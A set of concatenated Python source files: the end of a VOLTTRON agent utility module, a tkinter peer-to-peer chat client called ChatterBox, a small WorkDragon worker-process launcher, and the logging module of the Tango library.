if sub_addr.startswith('ipc://') and sub_addr[6:7] != '@':
if not os.path.exists(sub_addr[6:]):
sys.stderr.write('warning: subscription socket does not '
'exist: {}\n'.format(sub_addr[6:]))
if pub_addr.startswith('ipc://') and pub_addr[6:7] != '@':
if not os.path.exists(pub_addr[6:]):
sys.stderr.write('warning: publish socket does not '
'exist: {}\n'.format(pub_addr[6:]))
config = os.environ.get('AGENT_CONFIG')
agent = agent_class(subscribe_address=sub_addr,
publish_address=pub_addr,
config_path=config, **kwargs)
agent.run()
except KeyboardInterrupt:
pass
def vip_main(agent_class, identity=None, version='0.1', **kwargs):
"""Default main entry point implementation for VIP agents."""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
# Quiet printing of KeyboardInterrupt by greenlets
Hub = gevent.hub.Hub
Hub.NOT_ERROR = Hub.NOT_ERROR + (KeyboardInterrupt,)
config = os.environ.get('AGENT_CONFIG')
identity = os.environ.get('AGENT_VIP_IDENTITY', identity)
if identity is not None:
if not is_valid_identity(identity):
_log.warn('Deprecation warining')
_log.warn(
'All characters in {identity} are not in the valid set.'
.format(idenity=identity))
address = get_address()
agent_uuid = os.environ.get('AGENT_UUID')
volttron_home = get_home()
agent = agent_class(config_path=config, identity=identity,
address=address, agent_uuid=agent_uuid,
volttron_home=volttron_home,
version=version, **kwargs)
try:
run = agent.run
except AttributeError:
run = agent.core.run
task = gevent.spawn(run)
try:
task.join()
finally:
task.kill()
except KeyboardInterrupt:
pass
class SyslogFormatter(logging.Formatter):
_level_map = {logging.DEBUG: syslog.LOG_DEBUG,
logging.INFO: syslog.LOG_INFO,
logging.WARNING: syslog.LOG_WARNING,
logging.ERROR: syslog.LOG_ERR,
logging.CRITICAL: syslog.LOG_CRIT}
def format(self, record):
level = self._level_map.get(record.levelno, syslog.LOG_INFO)
return '<{}>'.format(level) + super(SyslogFormatter, self).format(
record)
class JsonFormatter(logging.Formatter):
def format(self, record):
dct = record.__dict__.copy()
dct["msg"] = record.getMessage()
dct.pop('args')
exc_info = dct.pop('exc_info', None)
if exc_info:
dct['exc_text'] = ''.join(traceback.format_exception(*exc_info))
return jsonapi.dumps(dct)
class AgentFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
if fmt is None:
fmt = '%(asctime)s %(composite_name)s %(levelname)s: %(message)s'
super(AgentFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def composite_name(self, record):
if record.name == 'agents.log':
cname = '(%(processName)s %(process)d) %(remote_name)s'
elif record.name.startswith('agents.std'):
cname = '(%(processName)s %(process)d) <{}>'.format(
record.name.split('.', 2)[1])
else:
cname = '() %(name)s'
return cname % record.__dict__
def format(self, record):
if 'composite_name' not in record.__dict__:
record.__dict__['composite_name'] = self.composite_name(record)
if len(record.args) > 0 \
and 'tornado.access' in record.__dict__['composite_name']:
record.__dict__['msg'] = ','.join([str(b) for b in record.args])
record.__dict__['args'] = []
return super(AgentFormatter, self).format(record)
def setup_logging(level=logging.DEBUG):
root = logging.getLogger()
if not root.handlers:
handler = logging.StreamHandler()
if isapipe(sys.stderr) and '_LAUNCHED_BY_PLATFORM' in os.environ:
handler.setFormatter(JsonFormatter())
else:
fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
handler.setFormatter(logging.Formatter(fmt))
root.addHandler(handler)
root.setLevel(level)
def format_timestamp(time_stamp):
"""Create a consistent datetime string representation based on
ISO 8601 format.
YYYY-MM-DDTHH:MM:SS.mmmmmm for unaware datetime objects.
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM for aware datetime objects
:param time_stamp: value to convert
:type time_stamp: datetime
:returns: datetime in string format
:rtype: str
"""
time_str = time_stamp.strftime("%Y-%m-%dT%H:%M:%S.%f")
if time_stamp.tzinfo is not None:
sign = '+'
td = time_stamp.tzinfo.utcoffset(time_stamp)
if td.days < 0:
sign = '-'
td = -td
seconds = td.seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
time_str += "{sign}{HH:02}:{MM:02}".format(sign=sign,
HH=hours,
MM=minutes)
return time_str
def parse_timestamp_string(time_stamp_str):
"""
Create a datetime object from the supplied date/time string.
Uses dateutil.parse with no extra parameters.
For performance reasons we try
YYYY-MM-DDTHH:MM:SS.mmmmmm
or
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM
based on the string length before falling back to dateutil.parse.
@param time_stamp_str:
@return: value to convert
"""
if len(time_stamp_str) == 26:
try:
return datetime.strptime(time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
pass
elif len(time_stamp_str) == 32:
try:
base_time_stamp_str = time_stamp_str[:26]
time_zone_str = time_stamp_str[26:]
time_stamp = datetime.strptime(base_time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
#Handle most common case.
if time_zone_str == "+00:00":
return time_stamp.replace(tzinfo=pytz.UTC)
hours_offset = int(time_zone_str[1:3])
minutes_offset = int(time_zone_str[4:6])
seconds_offset = hours_offset * 3600 + minutes_offset * 60
if time_zone_str[0] == "-":
seconds_offset = -seconds_offset
return time_stamp.replace(tzinfo=tzoffset("", seconds_offset))
except ValueError:
pass
return parse(time_stamp_str)
def get_aware_utc_now():
"""Create a timezone aware UTC datetime object from the system time.
:returns: an aware UTC datetime object
:rtype: datetime
"""
utcnow = datetime.utcnow()
utcnow = pytz.UTC.localize(utcnow)
return utcnow
def get_utc_seconds_from_epoch(timestamp=None):
"""
convert a given time stamp to seconds from epoch based on utc time. If
given time is naive datetime it is considered be local to where this
code is running.
@param timestamp: datetime object
@return: seconds from epoch
"""
if timestamp is None:
timestamp = datetime.now(tz=tzutc())
if timestamp.tzinfo is None:
local_tz = get_localzone()
# Do not use datetime.replace(tzinfo=local_tz) instead use localize()
timestamp = local_tz.localize(timestamp)
# utctimetuple can be called on aware timestamps and it will
# convert to UTC first.
seconds_from_epoch = calendar.timegm(timestamp.utctimetuple())
# timetuple loses microsecond accuracy so we have to put it back.
seconds_from_epoch += timestamp.microsecond / 1000000.0
return seconds_from_epoch
def process_timestamp(timestamp_string, topic=''):
"""
Convert timestamp string timezone aware utc timestamp
@param timestamp_string: datetime string to parse
@param topic: topic to which parse errors are published
@return: UTC datetime object and the original timezone of input datetime
"""
if timestamp_string is None:
_log.error("message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse_timestamp_string(timestamp_string)
except (ValueError, TypeError):
_log.error("message for {topic} bad timetamp string: {ts_string}"
.format(topic=topic, ts_string=timestamp_string))
return
if timestamp.tzinfo is None:
timestamp = timestamp.replace(tzinfo=pytz.UTC)
original_tz = None
else:
original_tz = timestamp.tzinfo
timestamp = timestamp.astimezone(pytz.UTC)
return timestamp, original_tz
def watch_file(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback()
def watch_file_with_fullpath(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback(fullpath)
def create_file_if_missing(path, permission=0o660, contents=None):
dirname = os.path.dirname(path)
if dirname and not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
open(path)
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
_log.debug('missing file %s', path)
_log.info('creating file %s', path)
fd = os.open(path, os.O_CREAT | os.O_WRONLY, permission)
try:
if contents:
os.write(fd, contents)
finally:
os.close(fd)
def fix_sqlite3_datetime(sql=None):
"""Primarily for fixing the base historian cache on certain versions
of python.
Registers a new datetime converter to that uses dateutil parse. This
should
better resolve #216, #174, and #91 without the goofy workarounds that
change data.
Optional sql argument is for testing only.
"""
if sql is None:
import sqlite3 as sql
sql.register_adapter(datetime, format_timestamp)
sql.register_converter("timestamp", parse_timestamp_string)
|
ChatterBox.py | #Main
import tkinter as tk
import tkinter.messagebox
import threading
from time import sleep
import socket
class ChatterBox:
def __init__(self):
self.port = 51540
self.root = tk.Tk()
self.q = None
self.root.geometry("460x250")
self.root.title("ChatterBox! Messenger")
self.RemoteCallsign = "Remote"
self.MyCallsign = "Me"
self.render()
self.historylock = threading.Lock()
self.sendinglock = threading.Lock()
self.root.protocol("WM_DELETE_WINDOW", self.shutdown)
self.shuttingdown = False
self.killserver = False
self.connected = False
self.launchServer()
self.historyboxqueue = []
self.typingStatusToSet = "Waiting for connect..."
self.root.after(200,self.updateHistory) #Evil polling, but tk is not t-safe by def.
self.root.after(600,self.updateNotifyTyping)
self.root.after(150,self.updateTyping)
self.root.after(100,self.cleanEmptySend)
self.oldText = ""
def launchServer(self):
self.serverThread = threading.Thread(target=self.server)
self.serverThread.start()
def launchClient(self):
self.clientThread = threading.Thread(target=self.client)
self.clientThread.start()
def centerWindow(self, win):
win.update_idletasks()
width = win.winfo_width()
height = win.winfo_height()
x = self.root.winfo_rootx() + 20
y = self.root.winfo_rooty() + 20
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
def shutdown(self):
self.shuttingdown = True
if self.q:
if self.connected:
self.sendMessage("_DISCONNECT")
self.connected = False
sleep(1.4) #Wait for Disconnect
self.q.close()
self.root.destroy()
def updateTyping(self):
self.statusLabel.configure(text=self.typingStatusToSet)
self.root.after(150,self.updateTyping)
def updateNotifyTyping(self):
curText = self.sendbox.get(0.0,tk.END).strip()
if curText != self.oldText:
self.sendMessage("_ISTYPING")
elif curText:
self.sendMessage("_ISENTERED")
else:
self.sendMessage("_NOTYPING")
self.oldText = curText
self.root.after(600,self.updateNotifyTyping)
def updateHistory(self):
self.historylock.acquire()
self.historybox.config(state=tk.NORMAL)
pos = self.scrollbar.get()[1]
for item in self.historyboxqueue:
self.historybox.insert(tk.END,item)
if pos == 1:
self.historybox.yview(tk.END)
self.historyboxqueue = []
self.historybox.config(state=tk.DISABLED)
self.historylock.release()
self.root.after(200,self.updateHistory)
def submitToHistory(self,message):
self.historylock.acquire()
self.historyboxqueue.append(message + "\n")
self.historylock.release()
def sendMessage(self,message):
self.sendinglock.acquire()
message = bytes(message,"UTF-8")
if self.connected:
sentChars = 0
while message:
j = self.q.send(message)
if j < 0:
self.sendinglock.release()
return False #Error
sentChars += j
message = message[j:]
self.sendinglock.release()
return True
else:
self.sendinglock.release()
return False
def server(self):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',self.port))
s.listen(1)
s.setblocking(False)
self.submitToHistory("Server thread is listening on port " +
str(self.port))
while not self.shuttingdown and not self.killserver:
try:
q,v = s.accept()
except:
q = None
sleep(2)
if q:
self.q = q
self.submitToHistory("Got connection! " + str(v[0]))
self.connected = True
break
if not self.shuttingdown and not self.killserver:
self.sendMessage("This is ChatterBox server.")
self.sendMessage("You are now free to move about the cabin.")
self.launchClient()
return
def prepsetIsTyping(self):
self.typingStatusToSet = "Remote is typing..."
def prepsetIsEntered(self):
self.typingStatusToSet = "Remote has entered text."
def prepsetNoTyping(self):
self.typingStatusToSet = "No remote activity."
def client(self):
self.submitToHistory("Client thread initialized.")
while not self.shuttingdown:
try:
msg = self.q.recv(1024).decode('utf-8')
if "_ISTYPING" in msg:
self.prepsetIsTyping()
elif "_ISENTERED" in msg:
self.prepsetIsEntered()
elif "_NOTYPING" in msg:
self.prepsetNoTyping()
elif "_DISCONNECT" in msg:
self.submitToHistory("Remote does proper disconnect")
self.connected = False
msg = msg.replace("_ISTYPING",'',100)
msg = msg.replace("_ISENTERED",'',100)
msg = msg.replace("_NOTYPING",'',100)
if "_NEWCALLSIGN" in msg:
old = self.RemoteCallsign
self.RemoteCallsign = msg.replace("_NEWCALLSIGN",'',100)
msg = (old + " changed their name to " +
self.RemoteCallsign)
leadingAlready = True
else:
leadingAlready = False
msg = msg.replace("_DISCONNECT",'',100)
if msg and not leadingAlready:
self.submitToHistory(self.RemoteCallsign + ": " + msg)
if msg and leadingAlready:
self.submitToHistory(msg)
sleep(0.2)
except:
sleep(0.2)
if not self.connected:
self.launchServer()
return
def mainloop(self):
self.root.mainloop()
def doAbout(self):
tk.messagebox.showinfo(title="About ChatterBox",
message="ChatterBox is an alpha chat client written "
"in pure Python, using tkinter for graphics.\n\n"
"Press Connect to start a new connection, or "
"wait until someone connects to you. \n\n"
"You can also change your callsign as seen by "
"your connected partner. \n\n"
"This program was written by henfredemars to "
"learn about networking and the unreliable nature "
"of data transfer over the internet.")
def doSetCallsign(self):
localroot = tk.Toplevel(self.root)
localroot.title("Set Callsign")
localroot.focus_set()
tk.Label(localroot,text="Callsign:").pack(side='left')
e = tk.Entry(localroot)
e.pack(side='left')
okayButton = tk.Button(localroot,text="Configure",
command=lambda:self.acceptCallsign(
localroot,e.get()))
okayButton.pack(side='left')
self.centerWindow(localroot)
def acceptCallsign(self,localroot,text):
if text:
self.MyCallsign = text
self.submitToHistory("I changed my name to " + text)
self.sendMessage("_NEWCALLSIGN" + text)
localroot.destroy()
def doConnect(self):
localroot = tk.Toplevel(self.root)
localroot.title("Connect")
localroot.focus_set()
tk.Label(localroot,text="IP Address:Port").pack(side='left')
e = tk.Entry(localroot)
e.pack(side='left')
okayButton = tk.Button(localroot,text="Configure",
command=lambda:self.acceptConnect(localroot,
e.get()))
okayButton.pack(side='left')
self.centerWindow(localroot)
def acceptConnect(self,localroot,addrstring):
self.submitToHistory("Configured for address " + addrstring)
localroot.destroy()
f = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
tl = addrstring.split(":")
f.connect((tl[0],int(tl[1])))
self.q = f
self.connected = True
except:
self.submitToHistory("Could not connect to address.")
return
self.killserver = True
self.submitToHistory("Server thread shutting down...")
self.launchClient()
def cleanEmptySend(self):
if not self.sendbox.get(0.0,tk.END).strip():
self.sendbox.delete(0.0,tk.END)
self.root.after(100,self.cleanEmptySend)
def doSend(self, event=None):
text = self.sendbox.get(0.0,tk.END).strip()
if not text:
return
self.sendbox.delete(0.0,tk.END)
self.submitToHistory("Me: " + text)
if not self.sendMessage(text):
self.submitToHistory("Send failed.")
def render(self):
mainframe = tk.Frame(self.root)
mainframe.pack(expand=True,fill='both')
connect = tk.Button(mainframe,text="Connect",command=self.doConnect)
connect.grid(row=0,column=3,sticky='nsew')
newcall = tk.Button(mainframe,text="Set Callsign",
command=self.doSetCallsign)
newcall.grid(row=1,column=3,sticky='nsew')
about = tk.Button(mainframe,text="About",command=self.doAbout)
about.grid(row=2,column=3,sticky='nsew')
send = tk.Button(mainframe,text="Send!",command=self.doSend)
send.grid(row=4,column=3,sticky='nsew')
self.sendbox = tk.Text(mainframe,height=4,width=20)
self.sendbox.bind('<Return>',self.doSend)
self.sendbox.grid(row=4,column=0,columnspan=3,sticky='nsew')
mainframe.columnconfigure(0,weight=1)
for i in range(0,3):
mainframe.rowconfigure(i,weight=1)
minframe = tk.Frame(mainframe)
self.historybox = tk.Text(minframe,height=6,width=20,state=tk.DISABLED)
self.historybox.grid(row=0,column=0,sticky='nsew')
minframe.rowconfigure(0,weight=1)
minframe.columnconfigure(0,weight=1)
self.scrollbar = tk.Scrollbar(minframe,
command=self.historybox.yview)
self.scrollbar.grid(row=0,column=1,sticky='ns')
minframe.grid(row=0,column=0,columnspan=3,rowspan=3,
sticky='nsew')
self.historybox.config(yscrollcommand=self.scrollbar.set)
self.statusLabel = tk.Label(mainframe,text="Waiting for connect...")
self.statusLabel.grid(row=3,columnspan=3,sticky='w')
if __name__=="__main__":
print("I'm main!")
app = ChatterBox()
app.mainloop()
|
core.py | """
Work in progress worker management for lynxfall
Note: This will only handle startup/shutdown and other tasks, not micromanaging individual workers.
Stats and error handling is a maybe that will be implemented after core functionality
Worker-specific tasks are another maybe unless that task is done via redis PUBSUB or other as rabbit is round-robin so not all workers get every task
Workdragon will have a redis pubsub protocol for external management
Support for windows/mac is not planned as of right now.
"""
import os
import subprocess
import threading
class Worker():
"""Represents a worker"""
def __init__(self, worker_num, process, thread):
self.process = process
self.worker_num = worker_num
self.thread = thread
class WorkDragon():
"""WorkDragon main class"""
def __init__(self, launcher):
self.workers = []
self.launcher = launcher
self.log_workers = True
self.workers_to_log = []
def worker_log(self, wnum):
"""Returns worker log function"""
def _log(proc):
for line in iter(proc.stdout.readline, b''):
line = line.decode('utf-8')
if int(wnum) in self.workers_to_log and self.log_workers:
print(f"{wnum}: {line}", end='')
return _log
def new_worker(self):
"""Creates a new worker"""
wnum = len(self.workers) + 1
proc = subprocess.Popen(['python3', '-u', self.launcher],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=dict(os.environ, LYNXFALL_WORKER_NUM=str(wnum))
)
t = threading.Thread(target=self.worker_log(wnum), args=(proc,))
self.workers_to_log.append(wnum)
t.start()
self.workers.append(Worker(wnum, proc, t))
|
logging.py | """
Tango makes heavy use of the :mod:`logging` module from the standard library to convey information to users.
When you're writing your own :class:`~tango.step.Step` implementations we encourage you to also use standard
Python logging as opposed to :func:`print` or other functions that write directly to ``stdout`` or ``stderr``.
This is easy enough since each :class:`~tango.step.Step` class already comes with its own logger:
:attr:`Step.logger <tango.step.Step.logger>`.
When using the `Tango CLI <./commands.html>`_ you can set the log level in several different ways:
1. Through a Tango `global settings <./commands.html#global-settings>`_ file.
2. With the environment variable ``TANGO_LOG_LEVEL``.
3. Or with the ``--log-level`` command-line option.
In some cases (like when running on `Beaker <https://beaker.org>`_) you may also want
to enable `"file friendly logging" <#tango.common.logging.FILE_FRIENDLY_LOGGING>`_.
Configuring logging in your own CLI
-----------------------------------
If you're writing your own CLI that uses tango, you can utilize the :func:`initialize_logging()`
function to easily configure logging properly.
For example,
.. testcode::
from tango.common.logging import initialize_logging, teardown_logging
initialize_logging(log_level="info")
logger = logging.getLogger()
logger.info("Running script!")
teardown_logging()
.. testoutput::
:options: +ELLIPSIS
[... INFO root] Running script!
If you want to have logs written to a file, you can use the :func:`file_handler` context manager.
Logging from worker processes or threads
----------------------------------------
If you have steps or other functions that spawn workers, and you want to enable logging within
those workers, you can call the :func:`initialize_worker_logging()` function to configure
logging within each worker. This assumes that you've called :func:`initialize_logging()` from the
main process (the tango CLI does this for you).
For example,
.. testcode::
import logging
import multiprocessing as mp
from tango import Step
from tango.common.logging import initialize_worker_logging
@Step.register("multiprocessing_step_example")
class MultiprocessingStep(Step):
def run(self, num_proc: int = 2) -> bool: # type: ignore
workers = []
for i in range(num_proc):
worker = mp.Process(target=_worker_function, args=(i,))
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
return True
def _worker_function(worker_id: int):
initialize_worker_logging(worker_rank=worker_id)
logger = logging.getLogger(MultiprocessingStep.__name__)
logger.info("Hello from worker %d!", worker_id)
"""
import logging
import logging.handlers
import os
import pickle
import socketserver
import struct
import sys
import threading
from contextlib import contextmanager
from typing import ContextManager, Generator, Optional
import click
from .aliases import EnvVarNames, PathOrStr
from .exceptions import SigTermReceived
from .util import _parse_bool, _parse_optional_int
FILE_FRIENDLY_LOGGING: bool = _parse_bool(
os.environ.get(EnvVarNames.FILE_FRIENDLY_LOGGING_ENV_VAR.value, False)
)
"""
If this flag is set to ``True``, we remove special styling characters from log messages,
add newlines to :class:`~tango.common.tqdm.Tqdm` output even on an interactive terminal, and we slow
down :class:`~tango.common.tqdm.Tqdm`'s output to only once every 10 seconds.
.. attention::
Unfortunately this won't affect ``tqdm`` output from other libraries that don't use
Tango's :class:`~tango.common.tqdm.Tqdm` wrapper.
By default, it is set to ``False``. It can be changed by setting the corresponding environment
variable (``FILE_FRIENDLY_LOGGING``) or field in a :class:`~tango.__main__.TangoGlobalSettings`
file (``file_friendly_logging``) to "true" or "false",
or from the command line with the ``--file-friendly-logging`` flag.
For example,
.. code-block::
$ tango --file-friendly-logging run ...
"""
TANGO_LOG_LEVEL: Optional[str] = os.environ.get(EnvVarNames.LOG_LEVEL_ENV_VAR.value, None)
"""
The log level to use globally. The value can be set from the corresponding environment variable
(``TANGO_LOG_LEVEL``) or field in a :class:`~tango.__main__.TangoGlobalSettings` file (``log_level``),
or from the command line with the ``--log-level`` option.
Possible values are "debug", "info", "warning", or "error" (not case sensitive).
For example,
.. code-block::
$ tango --log-level info run ...
.. note::
This does not affect the :data:`~tango.common.logging.click_logger`
or logs from :class:`~tango.common.Tqdm` progress bars.
"""
# Click logger disabled by default in case nobody calls initialize_logging().
TANGO_CLICK_LOGGER_ENABLED: bool = _parse_bool(
os.environ.get(EnvVarNames.CLICK_LOGGER_ENABLED_ENV_VAR.value, False)
)
class TangoLogger(logging.Logger):
"""
A custom subclass of :class:`logging.Logger` that does some additional cleaning
of messages when :attr:`FILE_FRIENDLY_LOGGING` is on.
This is the default logger class used when :func:`initialize_logging()` is called.
"""
def __init__(self, name):
super().__init__(name)
self._seen_msgs = set()
def log(self, level, msg, *args, **kwargs):
msg = msg if not FILE_FRIENDLY_LOGGING else click.unstyle(msg)
super().log(level, msg, *args, **kwargs)
def debug_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.debug(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def info_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.info(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def warning_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.warning(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def error_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.error(msg, *args, **kwargs)
self._seen_msgs.add(msg)
def critical_once(self, msg, *args, **kwargs):
if msg not in self._seen_msgs:
self.critical(msg, *args, **kwargs)
self._seen_msgs.add(msg)
class TangoFormatter(logging.Formatter):
def format(self, record: logging.LogRecord):
out = super().format(record)
if FILE_FRIENDLY_LOGGING:
out = click.unstyle(out)
return out
class WarningFilter(logging.Filter):
"""
Filters out everything that is at the WARNING level or higher. This is meant to be used
with a stdout handler when a stderr handler is also configured. That way WARNING and ERROR
messages aren't duplicated.
"""
def filter(self, record):
return record.levelno < logging.WARNING
class WorkerLogFilter(logging.Filter):
def __init__(self, rank=-1):
super().__init__()
self._rank = rank
def filter(self, record):
if self._rank != -1:
record.msg = f"[rank {self._rank}] {record.msg}"
return True
class LogRecordStreamHandler(socketserver.StreamRequestHandler):
"""Handler for a streaming logging request.
This basically logs the record using whatever logging policy is
configured locally.
Taken from
`the logging cookbook <https://docs.python.org/3.7/howto/logging-cookbook.html>`_.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
def unPickle(self, data):
return pickle.loads(data)
def handleLogRecord(self, record):
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
class LogRecordSocketReceiver(socketserver.ThreadingTCPServer):
"""
Simple TCP socket-based logging receiver.
Taken from
`the logging cookbook <https://docs.python.org/3.7/howto/logging-cookbook.html>`_.
"""
allow_reuse_address = True
def __init__(self, host: str, port: int = 0):
super().__init__((host, port), LogRecordStreamHandler)
self.abort = False
self.timeout = 0.2
def serve_until_stopped(self):
import select
while not self.abort:
rd, _, _ = select.select([self.socket.fileno()], [], [], self.timeout)
if rd:
self.handle_request()
_LOGGING_HOST: str = os.environ.get(EnvVarNames.LOGGING_HOST_ENV_VAR.value, "localhost")
_LOGGING_PORT: Optional[int] = _parse_optional_int(
os.environ.get(EnvVarNames.LOGGING_PORT_ENV_VAR.value, None)
)
_LOGGING_SERVER: Optional[LogRecordSocketReceiver] = None
_LOGGING_SERVER_THREAD: Optional[threading.Thread] = None
logging.setLoggerClass(TangoLogger)
click_logger = logging.getLogger("click")
"""
A logger that logs messages through
`click <https://click.palletsprojects.com/>`_'s
``click.echo()`` function.
This provides a convenient way for command-line apps to log pretty, styled messages.
"""
click_logger.propagate = False
class ClickLoggerHandler(logging.Handler):
def emit(self, record: logging.LogRecord) -> None:
if FILE_FRIENDLY_LOGGING:
click.echo(click.unstyle(record.getMessage()))
else:
click.echo(record.getMessage())
click_logger.addHandler(ClickLoggerHandler())
click_logger.disabled = TANGO_CLICK_LOGGER_ENABLED
def get_formatter() -> TangoFormatter:
log_format = "[%(process)d %(asctime)s %(levelname)s %(name)s] %(message)s"
return TangoFormatter(log_format)
def initialize_logging(
*,
log_level: Optional[str] = None,
enable_click_logs: Optional[bool] = None,
file_friendly_logging: Optional[bool] = None,
):
"""
Initialize logging, which includes setting the global log level, format, and configuring
handlers.
.. tip::
This should be called as early on in your script as possible.
.. tip::
You should also call :func:`teardown_logging()` as the end of your script.
.. tip::
For worker threads/processes, use :func:`initialize_worker_logging()` instead.
:param log_level:
Can be one of "debug", "info", "warning", "error". Defaults to the value
of :data:`TANGO_LOG_LEVEL`, if set, or "error".
:param enable_click_logs:
Set to ``True`` to enable messages from the :data:`click_logger`.
:param file_friendly_logging:
Enable or disable file friendly logging. Defaults to the value of :data:`FILE_FRIENDLY_LOGGING`.
"""
import multiprocessing as mp
is_main_process: bool
if hasattr(mp, "parent_process"): # python 3.8 or greater
is_main_process = mp.parent_process() is None # type: ignore
else:
is_main_process = mp.current_process().name == "MainProcess"
_initialize_logging(
log_level=log_level,
enable_click_logs=enable_click_logs,
file_friendly_logging=file_friendly_logging,
main_process=is_main_process,
)
def initialize_worker_logging(worker_rank: Optional[int] = None):
"""
Initialize logging in a worker thread/process.
:param worker_rank:
The rank/ID of the worker.
"""
return _initialize_logging(worker_rank=worker_rank, main_process=False)
def _initialize_logging(
*,
log_level: Optional[str] = None,
enable_click_logs: Optional[bool] = None,
file_friendly_logging: Optional[bool] = None,
worker_rank: Optional[int] = None,
main_process: bool = True,
):
global FILE_FRIENDLY_LOGGING, TANGO_LOG_LEVEL, TANGO_CLICK_LOGGER_ENABLED
global _LOGGING_HOST, _LOGGING_PORT, _LOGGING_SERVER, _LOGGING_SERVER_THREAD
if log_level is None:
log_level = TANGO_LOG_LEVEL
if log_level is None:
log_level = "error"
if file_friendly_logging is None:
file_friendly_logging = FILE_FRIENDLY_LOGGING
if enable_click_logs is None:
enable_click_logs = TANGO_CLICK_LOGGER_ENABLED
level = logging._nameToLevel[log_level.upper()]
# Update global flags and corresponding environment variables, if necessary,
# so that child processes can read the environment variables to determine the right
# settings.
TANGO_LOG_LEVEL = log_level
os.environ[EnvVarNames.LOG_LEVEL_ENV_VAR.value] = log_level
if file_friendly_logging is not None:
FILE_FRIENDLY_LOGGING = file_friendly_logging
os.environ[EnvVarNames.FILE_FRIENDLY_LOGGING_ENV_VAR.value] = str(
file_friendly_logging
).lower()
if enable_click_logs is not None:
TANGO_CLICK_LOGGER_ENABLED = enable_click_logs
os.environ[EnvVarNames.CLICK_LOGGER_ENABLED_ENV_VAR.value] = str(enable_click_logs).lower()
from .tqdm import logger as tqdm_logger
# Handle special cases for specific loggers:
# These loggers emit too many messages, so we tell them to be quiet unless they have something
# important to say.
for loud_logger in {"filelock", "sqlitedict"}:
logging.getLogger(loud_logger).setLevel(max(level, logging.WARNING))
# We always want to see all click messages if we're running from the command line, and none otherwise.
click_logger.setLevel(logging.DEBUG)
click_logger.disabled = not enable_click_logs
# We also want to enable the tqdm logger so that the progress bar lines end up in the log file.
tqdm_logger.setLevel(logging.DEBUG)
root_logger = logging.getLogger()
root_logger.setLevel(level)
root_logger.handlers.clear()
if main_process:
formatter = get_formatter()
# Create stdout and stderr handlers so that we can route DEBUG and INFO
# messages to stdout, and WARNING and ERROR messages to stderr.
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(level)
stdout_handler.addFilter(WarningFilter())
stdout_handler.setFormatter(formatter)
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.WARNING)
stderr_handler.setFormatter(formatter)
root_logger.addHandler(stdout_handler)
root_logger.addHandler(stderr_handler)
# Main process: set formatter and handlers, initialize logging socket and server.
# Set up logging socket to emit log records from worker processes/threads.
# Inspired by:
# https://docs.python.org/3.7/howto/logging-cookbook.html#sending-and-receiving-logging-events-across-a-network
_LOGGING_SERVER = LogRecordSocketReceiver(_LOGGING_HOST, 0)
_LOGGING_PORT = _LOGGING_SERVER.server_address[1]
os.environ[EnvVarNames.LOGGING_PORT_ENV_VAR.value] = str(_LOGGING_PORT)
_LOGGING_SERVER_THREAD = threading.Thread(
target=_LOGGING_SERVER.serve_until_stopped, daemon=True
)
_LOGGING_SERVER_THREAD.start()
else:
# Child process: set handler and level, no need to set formatting since only raw log records
# will be sent to the logging socket.
if _LOGGING_PORT is None:
raise ValueError(
"missing logging socket configuration, "
"did you forget to call 'initialize_logging()' from the main process?"
)
socket_handler = logging.handlers.SocketHandler(_LOGGING_HOST, _LOGGING_PORT)
if worker_rank is not None:
socket_handler.addFilter(WorkerLogFilter(worker_rank))
for logger in (root_logger, click_logger, tqdm_logger):
logger.handlers.clear()
logger.addHandler(socket_handler)
# Write uncaught exceptions to the logs.
